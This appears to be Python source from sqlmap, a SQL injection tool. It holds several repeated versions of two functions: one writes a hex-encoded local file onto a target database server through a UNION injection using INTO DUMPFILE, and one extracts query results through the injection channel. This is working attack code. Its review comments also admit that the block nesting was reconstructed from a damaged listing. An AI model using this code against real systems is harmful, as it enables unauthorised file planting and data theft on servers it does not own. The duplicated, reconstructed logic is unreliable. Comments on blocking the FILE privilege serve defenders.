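def unionWriteFile(self, wFile, dFile, fileType, confirm=True):
    """
    Send the hex-encoded content of wFile through the UNION query channel
    as a single "<hex value> INTO DUMPFILE '<dFile>'" statement.

    wFile    -- file handed to self.fileEncode for hex encoding
    dFile    -- destination path placed inside the DUMPFILE string literal
    fileType -- label used in the debug message and passed on to the
                confirmation step
    confirm  -- when true, self.askCheckWrittenFile is called afterwards

    Returns None. conf.paramFalseCond is forced to True only for the
    duration of the write and is restored even if the write raises.
    """

    logger.debug("encoding file to its hexadecimal string value")

    # Only the first element returned by fileEncode is used as the value
    # to be written.
    fcEncodedStr = self.fileEncode(wFile, "hex", True)[0]
    fcEncodedStrLen = len(fcEncodedStr)

    # The whole encoded value is sent inside the request, so an oversized
    # value on a GET parameter is reported before the attempt is made.
    if kb.injPlace == "GET" and fcEncodedStrLen > 8000:
        warnMsg = "the injection is on a GET parameter and the file "
        warnMsg += "to be written hexadecimal value is %d " % fcEncodedStrLen
        warnMsg += "bytes, this might cause errors in the file "
        warnMsg += "writing process"
        logger.warn(warnMsg)

    unionTest()

    # conf is shared state: restore the flag in a finally block so that an
    # exception raised while sending the statement cannot leave it set to
    # True for every later request.
    oldParamFalseCond = conf.paramFalseCond
    conf.paramFalseCond = True

    try:
        debugMsg = "exporting the %s file content to file '%s'" % (fileType, dFile)
        logger.debug(debugMsg)

        # Defensive note: on MySQL, INTO DUMPFILE needs the FILE privilege
        # and a secure_file_priv setting that permits the destination;
        # withholding FILE from application accounts blocks this path.
        sqlQuery = "%s INTO DUMPFILE '%s'" % (fcEncodedStr, dFile)
        unionUse(sqlQuery, direct=True, unescape=False, nullChar="''")
    finally:
        conf.paramFalseCond = oldParamFalseCond

    if confirm:
        self.askCheckWrittenFile(wFile, dFile, fileType)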
def __goInband(expression, expected=None, sort=True, resumeValue=True, unpack=True, dump=False):
    """
    Return the parsed output of a SQL expression fetched through the
    inband (UNION query) channel of the affected parameter.

    A value stored for the expression is looked up first when resumeValue
    is true; the live query (unionUse) runs only when that lookup yields
    None. An empty list is returned when no output is available.
    """

    # NOTE(review): block nesting was reconstructed from a listing whose
    # line breaks and indentation were lost; the "partial" check is assumed
    # to sit inside the resumeValue branch - confirm against upstream.
    fetched = None
    isPartial = False

    if resumeValue:
        fetched = resume(expression, None)

        # A missing stored value, or a non-numeric one where an integer
        # is expected, is flagged as partial.
        if not fetched or (expected == EXPECTED.INT and not fetched.isdigit()):
            isPartial = True

    if fetched is None:
        fetched = unionUse(expression, unpack=unpack, dump=dump)

    if not fetched:
        return []

    return parseUnionPage(fetched, expression, isPartial, None, sort)
def __goInband(expression, expected=None):
    """
    Return the parsed output of a SQL expression fetched through the
    inband (UNION query) channel of the affected parameter.

    A stored result for (conf.url, expression) in kb.resumedQueries is
    tried first; the live query (unionUse) runs when nothing usable was
    stored. An empty list is returned when no output is available.
    """

    # NOTE(review): block nesting was reconstructed from a listing whose
    # line breaks and indentation were lost; the "partial" check is assumed
    # to sit inside the resume branch - confirm against upstream.

    # Kept as one short-circuit expression: its value (not just its
    # truthiness) is forwarded to parseUnionPage below.
    resumable = (
        kb.resumedQueries
        and conf.url in kb.resumedQueries.keys()
        and expression in kb.resumedQueries[conf.url].keys()
    )

    result = None
    incomplete = False

    if resumable:
        result = resume(expression, None)

        # A missing stored value, or a non-numeric one where an integer
        # is expected, is flagged as partial.
        if not result or (expected == "int" and not result.isdigit()):
            incomplete = True

    if not result:
        result = unionUse(expression, resetCounter=True)

    if not result:
        return []

    return parseUnionPage(result, expression, incomplete, resumable)
def __goInband(expression, expected=None):
    """
    Fetch the output of a SQL expression over the inband (UNION query)
    channel of the affected parameter and return it parsed.

    The stored result for (conf.url, expression) is used when present in
    kb.resumedQueries; otherwise, or when it is empty, unionUse runs the
    query. Returns an empty list when there is no output to parse.
    """

    # NOTE(review): block nesting was reconstructed from a listing whose
    # line breaks and indentation were lost; the "partial" check is assumed
    # to apply only when a stored result was looked up - confirm upstream.

    # The raw value of this expression is passed on to parseUnionPage, so
    # it is not collapsed to a plain boolean.
    hasStored = (kb.resumedQueries
                 and conf.url in kb.resumedQueries.keys()
                 and expression in kb.resumedQueries[conf.url].keys())

    page = resume(expression, None) if hasStored else None

    # Flag the stored value as partial when it is empty, or when an
    # integer is expected and the value is not made of digits only.
    flagged = False
    if hasStored and (not page or (expected == "int" and not page.isdigit())):
        flagged = True

    if not page:
        page = unionUse(expression, resetCounter=True)

    parsed = []
    if page:
        parsed = parseUnionPage(page, expression, flagged, hasStored)

    return parsed
def unionWriteFile(self, wFile, dFile, fileType, confirm=True):
    """
    Send the hex-encoded content of wFile through the UNION query channel
    as a single "<hex value> INTO DUMPFILE '<dFile>'" statement.

    wFile    -- file handed to self.fileEncode for hex encoding
    dFile    -- destination path placed inside the DUMPFILE string literal
    fileType -- label used in the debug message and passed on to the
                confirmation step
    confirm  -- when true, self.askCheckWrittenFile is called afterwards

    Returns None.
    """

    logger.debug("encoding file to its hexadecimal string value")

    # Only the first element returned by fileEncode is used as the value
    # to be written.
    hexValue = self.fileEncode(wFile, "hex", True)[0]
    hexLength = len(hexValue)

    # The whole encoded value is sent inside the request, so an oversized
    # value on a GET parameter is reported before the attempt is made.
    if kb.injection.place == PLACE.GET and hexLength > 8000:
        logger.warn(
            (
                "the injection is on a GET parameter and the file "
                "to be written hexadecimal value is %d "
                "bytes, this might cause errors in the file "
                "writing process"
            ) % hexLength
        )

    logger.debug("exporting the %s file content to file '%s'" % (fileType, dFile))

    # Defensive note: on MySQL, INTO DUMPFILE needs the FILE privilege and
    # a secure_file_priv setting that permits the destination; withholding
    # FILE from application accounts blocks this path.
    unionUse("%s INTO DUMPFILE '%s'" % (hexValue, dFile), unpack=False)

    if confirm:
        self.askCheckWrittenFile(wFile, dFile, fileType)